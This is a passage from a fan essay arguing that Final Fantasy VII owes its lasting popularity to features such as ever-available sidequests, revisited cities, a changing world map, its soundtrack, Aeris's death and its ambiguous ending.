advancements that, as the first 3D RPG, it really didn't have to do to enhance its image. Some are plot elements that other games haven't quite been able to capture. Some are inclusions that are generally good for any RPG. And some are simply unquantifiable. Some are obvious. Some are subtle. Some are major. Some are so small you'll wonder why I even bothered including them here. And some probably never occurred to you, but as soon as you read them you'll realize, "Huh, I guess that was pretty cool." But all, I feel, contributed to Final Fantasy VII becoming as popular as it is today. Minigames and Sidequests We'll start with an obvious one. It's something that's often forgotten when you think back on the game, but you'll complete a mini-game or mini-task every hour of the game. From tiny tasks, like the Mayor Domino's password, Rufus's send-off and the Junon parade, to major minigames, like the submarine game and now-famous snowboarding game, there's constant interruption from the typical flow of the game. This is rather underappreciated, but it's critical to maintaining the quick-feeling flow of the game. The fundamental sequence of run around, battle, run around, battle that comprises the core of most RPGs becomes very mundane after a while. But Final Fantasy VII's incredibly frequent diversions comprise an effective way to break up the monotony. A close corollary of that is Final Fantasy VII's abundance of sidequests and optional areas. Wutai, Ultimate Weapon, Fort Condor, the Sunken Gelnika and of course, Chocobo Races: these optional areas and tasks provide great diversions from the main quest. But it's not enough to just have a bunch of sidequests - you must also have... Sidequests are consistently available This has always been one of my pet peeves of many games - Final Fantasy VIII especially comes to mind. In so many RPGs, sidequests really aren't feasible - or often even available - until the end. You've completed the entire rest of the plot, all that remains is entering the final dungeon for the final battle, and suddenly you have a whole host of alternatives available. At this point, completing the optional parts can become more of a chore - an ironic situation considering only a few hours earlier you were likely desperate for something to do besides just run through the plot. Final Fantasy VII somehow captures what other games have missed out on. Wutai, Chocobo Races, Fort Condor: these are all available throughout substantial portions of the game. The player has the option of completing a sidequest when it best suits them (when they've grown a bit bored of the main plot, for example), and is never fully forced to turn away from the main plot to complete one just because it will soon cease to be available. Part of the reason Final Fantasy VII was able to accomplish this is through the use of the airship, making it easy to travel among the different locations, which brings us to our next point... Access to the airship for a large portion of the game I don't mean to nitpick on Final Fantasy VIII since this is a fault of many RPGs, but it in particular comes to mind: in Final Fantasy VIII, when you get the airship, you have two options: do sidequests, or finish the game. No plot progression actually occurs while the airship is in your possession. It's little more than a tool to enable easier exploration of the world, not a tool for accomplishing any plot objectives. And this is the airship's role in many other games as well. Final Fantasy VII, however, is different. The airship is in your possession for a good third of the game, and it serves as your transportation among several required portions of the plot (after receiving it, you still must go by Mideel, Corel, Fort Condor, Junon, Rocket Town, The City of the Ancients, and Midgar). This may seem somewhat minor, but I feel it adds some crucial entertainment to the game. The need to travel around the entire world (and the ability to fly over it) hammers home the idea that the conflict your characters are in is for the future of the planet, an effect that can never be fully grasped for earth-bound characters. It also cements your characters' status as a real team with a real objective, not a rag-tag collection of misfits that just happens to somehow save the world. This constant possession of the airship also enables another severely underappreciated aspect of the game... You actually revisit cities This has long been a pet peeve of my in RPGs. You're traveling around, you get to a beautifully rendered and vibrant town, you finish the plot portion there... and then you never, ever return. But this is still the formula for most RPGs - you visit each location once and move on. Sometimes you come back for weapons or sidequests, but not for actual plot development. Final Fantasy VII is the extreme opposite end of the spectrum. Not only do you revisit several places, you actually revisit most places: Midgar, Fort Condor, Junon, Corel, the Gold Saucer, Cosmo Canyon, Rocket Town, the City of the Ancients and Mideel are all visited at least twice within the core plot of the game. These last two I believe are absolutely critical to what has kept Final Fantasy VII so endearing: it isn't a linear path through a linear plotline. The plotline may be linear, but the pathway taken among it encompasses the whole world multiple times. In the end, instead of recalling cities in the order of their initial visit, you actually recall them by their geographic location because this time, their location actually mattered. You didn't have to just find them once and forget about them. You didn't magically find yourself where the next point in the plot took place. You went about on your own, chasing the plot in what seemed like an independent, non-linear way, even as the plotline was essentially linear. And this seeming non-linearity (despite the decidedly linear plot) is enhanced even further by another aspect... The World Map changes Another underappreciated aspect of the game, but as you progress, items on the world map actually alter their appearance. The Temple of the Ancients disappears into a hole in the ground; Mideel is wiped off the face of the planet; Junon's cannon finds itself transported to Midgar; the rocket in Rocket Town actually takes off; the Weapons leave enormous craters where they land, highlighted by Ultima Weapon's ridiculous destruction of the earth outside Junon; and a shield forms - then disappears - around the Northern Crater. Why does this matter? To me, these changes really reinforce the idea that what your characters are doing in the game actually matters. This isn't a story that's carved into the framework of an existing world and lives humbly inside it: this is a story that impacts and affects the world, destroying buildings and reforming the ground itself. These are aspects that matter, and people actually react to them, unlike in so many other games where your group is on a quest to save the world, except somehow no one knows about it. The ability to roam freely and easily, the requirement to revisit places you've already been before, and the constant changes in the World Map (often directly due to your actions), really tie together the Final Fantasy VII planet as a cohesive entity and not just a necessary element for a story to take place on. Soundtrack An obvious inclusion, but it can't be underestimated. The soundtrack of Final Fantasy VII remains one of the most iconic video game soundtracks of all time (although admittedly, part of that is the popularity of the game as a whole enhancing the popularity of the soundtrack). One-Winged Angel's popularity is well-documented, but the music behind other parts - like the final Jenova battle and Diamond Weapon's attack on Midgar - are fantastic as well. Perhaps the highlight of the soundtrack comes at the very end, in the closing FMV (or maybe this is simply my favorite part). Here we not only receive perfect music for the desperation as the crater collapses, but Aeris's theme and Tifa's theme are expertly inputted to symbolize the transition from Aeris saving the world to Tifa saving Cloud. It's that type of musical use that pervades the game and makes the soundtrack so memorable - the music doesn't simply set the scene, it connects various parts. Tifa's theme, Aeris's theme, and Jenova's theme all recur throughout the game, drawing connections for the player that they might not pick up on themselves. Camera movement during battles Nowadays, this is completely taken for granted: the camera moves around the battlefield to highlight certain characters, certain spells, certain actions. It's a cornerstone of the battle sequence - entire teams exist in game development whose sole objective is to design this camera effectively. Final Fantasy VII, as the first major 3D RPG, developed this innovation - but they didn't have to. As the first 3D RPG, they could've simply had 3D models of the characters on one side of the screen and 3D models of the enemy on the other, similar to the way classic 2D RPGs display the battlefield. The presence of 3D models for the actions would've made up for the stationary camera, and likely no one would've commented on its absence - it simply would be an innovation left for the next game. But Final Fantasy VII went above and beyond and developed this new display tactic. They didn't have to - they had enough innovations in the game to more than support it. But they went the extra mile and made the game not just adequate, not just great: they did absolutely everything they could do to make this game perfect. Another example of this is the ability for you to move your own characters during some FMVs, like the entrance to the crater. The incredible FMVs were enough, but they opted to include the functionality to move your character during the FMVs as well. They did absolutely everything that could've been asked of them. Plot sequences are cohesive A bit of an outlier compared to the rest of these notes, one thing that can't be said about the Final Fantasy VII plot is that it tends get a little plodding; I've heard dozens of criticisms of Final Fantasy VII (many valid), but never that the plot is too slow or too tedious. There are many reasons for this, such as a generally interesting plotline, a persistent goal (never just traveling without reason) and frequent movement between locales, but this one is less obvious: the cohesiveness of individual plot sequences goes a long way in helping the plot stay interesting. While there is something to be said for a plot that blends seamlessly among separate locations and events, the trouble with a plot like that is that the game tends to all run together in the player's mind. There's never a sense of progress through the game as there aren't discrete moments of notable change in progression. Final Fantasy VII, instead, separates different elements of the plot very discretely. There Junon sequence is discrete from the Costa Del Sol sequence; the Corel sequence is discrete from the Gold Saucer sequence. What this does is it gives the player a consistent feeling of progress. There's never a question of "I've played for two hours, and what have I gotten done?" The player feels they're consistently making headway through the plot, and thus the plot does not ever seem slow and plodding. This has the added benefit of enhancing recall of the game. The human brain can only associate so much together before it begins to become jumbled; it's not able to accurately sort and place the elements of a plot without any 'gaps' in it, be they for travel or some other idle task. The discrete nature of Final Fantasy VII's plot sequences allow them each individually to be easily recalled. The first Junon sequence, for example, has a very clear beginning and end, enhancing the player's ability to recall what happens in between. The absence of these clear beginnings and clear ends makes sort events difficult, a problem for many more games with more 'smooth' plots. An emotional, sensical, necessary, and initially confusing death One of the defining moments in RPG history, this one's rather obvious - Aeris's death is likely the most memorable moment of Final Fantasy VII for most of its players. But Aeris was hardly the first fictional character to die, and wasn't even the first RPG character to die (although she's the first major playable character to die). What makes Aeris's death more memorable than any of the deaths that precede it? It's the perfect combination of multiple plot elements - before, during and after - the sequence that makes it as poignant as it is. First of all, the death is obviously emotional, for a wide variety of reasons. For one, among the members of your party, Aeris is almost the schoolgirl, the child - she's young, innocent and borderline naive. She's the least deserving of death of any of your party members. Her position on the platform enhances this - she's kneeling and praying, completely defenseless. She is a completely innocent victim, with absolutely no level of justice in her death. Her death is also sensical to the plotline - it's not contrived for shock value, it's not placed in because the developers believed it would enhance the game's popularity; it's actually a sensical piece of the plot. Sephiroth is seeking to summon Meteor and destroy the earth, and Aeris is the only one that can stop him: these are two key pieces to the plot, not add-ons to shine some realism on the death the writers wanted anyway. But more than the death simply being sensical, it's downright necessary. This point is arguable (and has been argued over the entire course of the game's history), but my interpretation is that Aeris's death was actually necessary for the planet to be saved. Bugenhagen states, "If a soul seekingHoly reaches the planet, it will appear." To me, that means that Aeris actually had to die and her soul return to the lifestream in order for Holy to be summoned. In effect, Sephiroth killing Aeris is exactly what resulted in Meteor being defeated. It was necessary for the plot, and it was the ultimate in poetic justice: Sephiroth played a part in his own downfall. This idea, to me, is simply beautiful. But it's not enough to just be that beautiful and perfect - the effect of this poetic justice is enhanced tenfold by a simple idea: you don't initially know what impact her death has. At the time, her death appears to just be an indication of Sephiroth's cruelty, killing a defenseless girl. It's a murder, but nothing more. But as the game goes on, you learn the true impact, the true value that her death had. It's because of her death that the world is saved. It's because Sephiroth murdered her that she was able to reach the planet and summon Holy. But you didn't know that - you don't learn it until long after she's gone. That's sheerly beautiful. ...and the aftermath: the consistent possibility of another death While Aeris's death is an obvious cornerstone of Final Fantasy VII's popularity, it has an effect that isn't fully appreciated. It used to be a common idea in the entertainment industry that two people never die: a main character, or the dog. It was part of the culture that you knew that the main characters wouldn't die, no matter how much danger they were in. Supporting characters could die, but it was an unspoken tenet that the characters that you could equip and level-up would stay with you. Aeris changed that, and the shadow of it hangs over the rest of the game. When Tifa is in the gas chamber or when Cloud is lost in himself in Mideel, you can't depend any longer on that unspoken knowledge that they'll be ok. One character has already died, how are you to know another won't? This alteration in the fundamental game dynamic cuts through its initial nature as a dependable, standard game and instantly sets it apart as one in which anything is fair game. An ambiguous ending The ultimate gamble for any game, movie, book or show. The ambiguous ending is a very delicate balance: you have to give enough information for the viewer to ask questions, but not so much that someone can figure out the answers. Plus, you have to provide something unexpected: it's not enough to set the entire game up for one question (will Holy stop Meteor?) and then simply not answer it. Final Fantasy VII hits that balance on the head. The ending sequence provides plenty of information: we know that Holy was effectively summoned, we know that Meteor broke through, and we know the Lifestream started coming out. What we don't know is what happens after that. Does the Lifestream stop Meteor's impact? Or was the Lifestream just gathering to heal the imminent wound? And just for an additional twist, we do find out that the planet wasn't destroyed altogether: after the credits we see Red XIII with cubs galloping out 500 years later. Questions answered, right? Wrong - as Bugenhagen said, when Holy appears, "Everything will disappear. Perhaps, even, ourselves." While the planet might not be destroyed, it isn't mankind that we see living there - it's Red XIII, a lion. Did Holy wipe humanity off the face of the planet? There's no way of knowing until Advent Children came out. Charm That wonderfully unquantifiable, indescribable little aspect that we like to call 'charm'. Charm, to me, is the little things throughout the game that a modern game likely wouldn't do, or couldn't do. These are things that simply would've be entertaining viewed in our fully 3D vibrant world that we live in now. The date sequence, especially the play, comes to mind. A modern game wouldn't be able to capture the simple entertainment from it. Done in full 3D, it would look silly; and with voice actors, it'd be downright awkward. The same can be said for the Honeybee Inn. For Final Fantasy VII, it's suggestive enough for older kids to understand, but innocent enough for younger kids to be blissfully ignorant of what the heck is going on. Could a new game get away with that? I certainly don't think so. Final Fantasy VII is, quite simply, a charming game - and that, to me, is the unquantifiable, subtle aspect that really helps Final Fantasy VII retain an audience with the current generation. Despite its age, it still has things you simply can't find in the modern era of games. Final Fantasy VII is in and of itself a great game, though it's the discrete, subtle things that it does that has taken it to the transcendent level it has reached. It was in the right place at the right time to be the first 3D RPG, but that isn't the source of its persistent popularity. Final Fantasy VII was a rich combination of new technical features, excellent ideas, and simple inclusions that took the game to its own place in gamers' hearts. There have been many great games since, but none has been able to capture the magic, the perfection, or the charm of Final Fantasy VII.